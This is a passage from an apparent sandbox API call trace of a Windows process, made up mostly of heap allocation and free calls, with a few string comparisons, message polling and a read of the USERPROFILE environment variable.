(HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0258.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0258.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0258.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0258.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0258.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0258.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0258.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0258.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0258.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0258.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0258.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0258.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0258.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="desktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0258.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0258.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0258.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0258.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0258.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0258.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0258.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0258.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0258.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0258.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0258.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0258.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0258.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0258.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0258.010] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0258.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0258.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0258.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0258.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0258.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0258.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0258.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0258.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0258.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0258.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0258.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0258.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0258.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0258.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0258.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0258.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0258.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0258.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0258.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0258.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0258.011] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="desktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0258.011] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0258.011] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0258.011] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0258.011] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0258.011] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0258.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0258.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0258.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0258.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0258.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0258.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0258.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0258.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0258.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0258.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0258.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0258.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0258.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0258.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0258.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0258.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0258.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0258.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0258.012] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0258.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0258.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0258.012] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0258.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0258.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0258.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0258.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16f8 [0258.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0258.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0258.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0258.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0258.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0258.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0258.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0258.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0258.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0258.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0258.013] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0258.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0258.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0258.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa640 [0258.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0258.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0258.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab38 [0258.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0258.013] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0258.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0258.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0258.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0258.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0258.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0258.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0258.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0258.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0258.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0258.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0258.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0258.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0258.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0258.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0258.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0258.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0258.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0258.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0258.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0258.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0258.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0258.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0258.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0258.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0258.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0258.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0258.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0258.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0258.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1708 [0258.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0258.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0258.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0258.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0258.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0258.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0258.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0258.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0258.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0258.015] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0258.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0258.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0258.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa958 [0258.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0258.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0258.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab38 [0258.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0258.016] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0258.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0258.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0258.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0258.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0258.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0258.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0258.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0258.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0258.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0258.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0258.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0258.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0258.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0258.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0258.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0258.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0258.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x2420898 [0258.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0258.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0258.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0258.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0258.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0258.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0258.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0258.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0258.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0258.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1808 [0258.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0258.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0258.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0258.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0258.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17e8 [0258.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0258.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0258.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0258.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa640 [0258.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0258.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0258.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0258.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0258.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0258.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0258.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0258.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0258.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0258.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0258.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0258.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0258.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0258.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0258.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0258.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0258.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0258.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0258.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0258.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0258.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0258.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0258.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0258.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0258.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0258.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0258.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0258.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0258.019] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0258.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0258.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0258.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0258.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0258.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0258.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0258.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0258.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0258.020] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0258.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0258.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0258.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0258.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0258.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0258.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0258.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0258.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0258.020] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0258.020] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0258.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0258.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0258.020] 